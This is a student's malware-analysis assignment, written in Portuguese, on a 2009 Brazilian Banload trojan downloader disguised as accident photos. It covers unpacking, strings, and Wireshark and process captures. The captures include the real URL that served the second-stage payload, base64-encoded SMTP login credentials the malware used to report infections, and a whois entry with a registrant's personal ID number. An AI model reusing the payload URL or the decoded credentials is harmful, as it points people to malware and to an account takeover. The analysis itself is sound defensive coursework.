analise de malware - Fernando Bracalente
Transcrição
analise de malware - Fernando Bracalente
Fernando Bracalente Seg15 O trabalho final consiste em escolher um dos "malwares-novos" e responder algumas questões. Questões: 1. Qual o nome do arquivo? Fotos_acidenteJPEG.exe 2. Qual o md5 do arquivo escolhido? 286b95fe9e651f45f6181c29968f430d 3. Qual a razão do nome utilizado pelo arquivo? Para persuadir o usuário a clicar no arquivo 4. O arquivo está compactado? Sim Se sim, com qual compactador? .aspack 5. Sem executar o binário, é possível descrever qual sua funcionalidade, o que ele vai fazer? Sim, utilizei o PEiD descompactando o arquivo executável com o puglin (PEiD Generic Unpacker), apos gerar o arquivo Fotos_acidenteJPEG.exe.unpacked_.exe gerei o hash do arquivo 7748a2f088774a0126552dd806877537, utilizei o comando strings.exe c:\jacomo\Fotos_acidenteJPEG.exe.unpacked_.exe | grep http e verifiquei que existe uma url http://www.assembleiadedeusmorumbi.com.br/fotos/13/sb.exe, este malware é um downloader, baixei o arquivo sb.exe manualmente e gerei o hash 62d3f55699c236af45afec937a4bfff8, este arquivo tem 4.291KB Analisando o arquivo SB.exe, utilizei o Wireshark e executei o sb.exe em um ambiente controlado, este arquivo envia um e-mail avisando que o micro esta infectado para 2 destinatários, [email protected] e [email protected] Segue o conteúdo encontrado pelo Wireshark 220 dargo.hst.terra.com.br ESMTP EHLO MALWARE 250-dargo.hst.terra.com.br 250-PIPELINING 250-SIZE 26214400 250-AUTH LOGIN PLAIN TRRPROXY_V1 250-ENHANCEDSTATUSCODES 250-8BITMIME 250 DSN RSET 250 2.0.0 Ok AUTH LOGIN 334 VXNlcm5hbWU6 c210cC5yb3hAdGVycmEuY29tLmJy 334 UGFzc3dvcmQ6 ZmFiaW83NDE= 235 2.7.0 Authentication successful MAIL FROM:<[email protected]> 250 2.1.0 Ok RCPT TO:<[email protected]> 250 2.1.5 Ok RCPT TO:<[email protected]> 250 2.1.5 Ok RCPT TO:<[email protected]> 250 2.1.5 Ok DATA 354 End data with <CR><LF>.<CR><LF> From: "Infect" <[email protected]> Subject: MALWARE To: [email protected] Date: Sat, 4 Apr 2009 17:49:08 -0300 X-Priority: 3 X-Library: Indy 9.00.10 Aguardando Resposta... . 250 2.0.0 Ok: queued as 2047748000091 QUIT 221 2.0.0 Bye Jacomo depois de instalar o malware eu rodei o netstat –nao e a única relação no final que notei foi que o processo referente ao malware foi uma porta 1062 criada no localhost. C:\_>netstat -nao Proto TCP TCP TCP TCP TCP UDP UDP UDP UDP Local Address 0.0.0.0:135 0.0.0.0:445 0.0.0.0:3389 127.0.0.1:1029 192.168.137.130:139 0.0.0.0:445 0.0.0.0:500 0.0.0.0:1025 0.0.0.0:1042 Foreign Address 0.0.0.0:0 0.0.0.0:0 0.0.0.0:0 0.0.0.0:0 0.0.0.0:0 *:* *:* *:* *:* State LISTENING LISTENING LISTENING LISTENING LISTENING PID 956 4 880 1100 4 4 728 1104 1744 UDP UDP UDP UDP UDP UDP UDP UDP UDP 0.0.0.0:4500 127.0.0.1:123 127.0.0.1:1060 127.0.0.1:1062 127.0.0.1:1900 192.168.137.130:123 192.168.137.130:137 192.168.137.130:138 192.168.137.130:1900 *:* *:* *:* *:* *:* *:* *:* *:* *:* 728 1048 1684 148 1184 1048 4 4 1184 C:\_>pslist.exe PsList 1.26 - Process Information Lister Copyright (C) 1999-2004 Mark Russinovich Sysinternals - www.sysinternals.com Process information for MALWARE: Name Pid Pri Thd Hnd Priv CPU Time Elapsed Time Idle 0 0 1 0 0 0:23:29.937 0:00:00.000 System 4 8 54 362 0 0:00:11.062 0:00:00.000 smss 508 11 3 21 168 0:00:00.156 0:25:59.640 csrss 648 13 11 380 1736 0:00:13.609 0:25:59.015 winlogon 672 13 14 232 3324 0:00:01.359 0:25:58.750 services 716 9 16 342 3496 0:00:02.578 0:25:58.203 lsass 728 9 18 330 3504 0:00:01.312 0:25:58.062 svchost 880 8 21 210 2624 0:00:00.218 0:25:57.359 svchost 956 8 11 234 1628 0:00:00.156 0:25:57.046 svchost 1048 8 71 1416 12740 0:00:02.593 0:25:56.953 svchost 1104 8 6 75 1152 0:00:00.093 0:25:56.859 svchost 1184 8 15 213 1756 0:00:00.156 0:25:56.250 explorer 1432 8 10 422 15036 0:00:15.015 0:25:55.234 spoolsv 1572 8 11 118 3412 0:00:00.109 0:25:54.468 VMwareUser 1696 8 2 36 1108 0:00:01.015 0:25:53.296 SbieSvc 1896 8 7 70 1792 0:00:00.046 0:25:35.953 userdump 192 13 4 41 1556 0:00:00.031 0:25:28.234 VMwareService 280 13 3 55 924 0:00:00.796 0:25:28.109 alg 1100 8 5 103 1044 0:00:00.031 0:25:22.125 wireshark 1744 8 3 174 62972 0:00:51.359 0:23:38.859 cmd 1392 8 1 31 1932 0:00:00.156 0:20:27.906 taskmgr 1380 13 3 63 1180 0:00:01.156 0:18:44.265 Winup 1368 8 1 112 40904 0:00:23.375 0:17:33.875 mmc 536 8 6 223 5444 0:00:01.078 0:06:35.000 Fotos_acidenteJPEG 1684 8 4 125 1800 0:00:00.171 0:03:43.437 dumpcap 1892 8 1 54 1996 0:00:00.062 0:03:24.437 Fotos_acidenteJPEG 148 8 4 125 1800 0:00:00.250 0:02:57.703 pslist 1964 13 2 71 676 0:00:00.046 0:00:00.062 As informações do registro.br sobre o domínio que esta hospedando o arquivo sb.exe whois domínio: entidade: documento: país: ID entidade: ID admin: ID técnico: ID cobrança: servidor DNS: status DNS: último AA: servidor DNS: status DNS: último AA: criado: expiração: alterado: status: assembleiadedeusmorumbi.com.br Edimilson Francisco de Oliveira 588.255.926-04 BR EDFOL12 EDFOL12 EDFOL12 EDFOL12 ns1.t5.com.br 04/04/2009 AA 04/04/2009 ns2.t5.com.br 04/04/2009 NOT SYNC ZONE 04/04/2009 24/07/2008 #4709932 24/07/2009 04/08/2008 publicado ID: nome: e-mail: criado: alterado: EDFOL12 Edimilson Francisco de Oliveira [email protected] 24/07/2008 24/07/2008 IP do domínio --> 201.33.17.140 6. Utilizando qualquer método, ao executar o binário em um ambiente *controlado*, quais alterações no sistema esse arquivo gera? Executei o malware e analise os pacotes com o Wireshark, o malware iniciou o download do arquivo sb.exe GET /fotos/13/sb.exe HTTP/1.1 Accept: */* Accept-Encoding: gzip, deflate User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1) Host: www.assembleiadedeusmorumbi.com.br Connection: Keep-Alive HTTP/1.1 200 OK Date: Sun, 05 Apr 2009 12:05:29 GMT Server: Apache Last-Modified: Sun, 05 Apr 2009 09:01:45 GMT ETag: "a5321f1-384600-466cb07f91040" Accept-Ranges: bytes Content-Length: 3687936 Keep-Alive: timeout=8, max=80 Connection: Keep-Alive Content-Type: application/x-msdos-programConnection: Keep-Alive qual o nome do processo? Fotos_acidenteJPEG PID 1684 / 148 o arquivo muda de nome ao ser executado? Não cria um novo arquivo? sim baixa alguma coisa? sim, sb.exe 7. Agora com essas informações para que serve o binário? Server para executar o malware. 8. Qual o resultado do virustotal.com? 8/32 (faça um print-screen e envie). Os antivírus que encontraram foram: Antiy-AVL 2.0.3.1 2009.04.05 Trojan/Win32.Banload Authentium 5.1.2.4 2009.04.05 W32/Banload.A.gen!Eldorado Avast 4.8.1335.0 2009.04.05 Win32:Trojan-gen {Other} CAT-QuickHeal 10.00 2009.04.04 TrojanDownloader.Banload.acmm DrWeb 4.44.0.09170 2009.04.05 Trojan.DownLoader.origin eSafe 7.0.17.0 2009.04.05 Suspicious File F-Prot 4.4.4.56 2009.04.05 W32/Banload.A.gen!Eldorado GData 19 2009.04.05 Win32:Trojan-gen {Other} Kaspersky 7.0.0.125 2009.04.05 Trojan-Downloader.Win32.Banload.actw NOD32 3988 2009.04.04 a variant of Win32/TrojanDownloader.Banload.CHQ Panda 10.0.0.14 2009.04.05 Trj/Banbra.GGM Sophos 4.40.0 2009.04.05 Mal/Behav-130 TrendMicro 8.700.0.1004 2009.04.03 Mal_Banld-1 VBA32 3.12.10.2 2009.04.05 Trojan-Downloader.Win32.Banload.zwf Hash MD5 do site virus total bate com o hash que gerei. Questão bônus: É possível descompactar o binário? Qual o procedimento? Resp. pergunta 5 Enviar trabalho por e-mail para [email protected]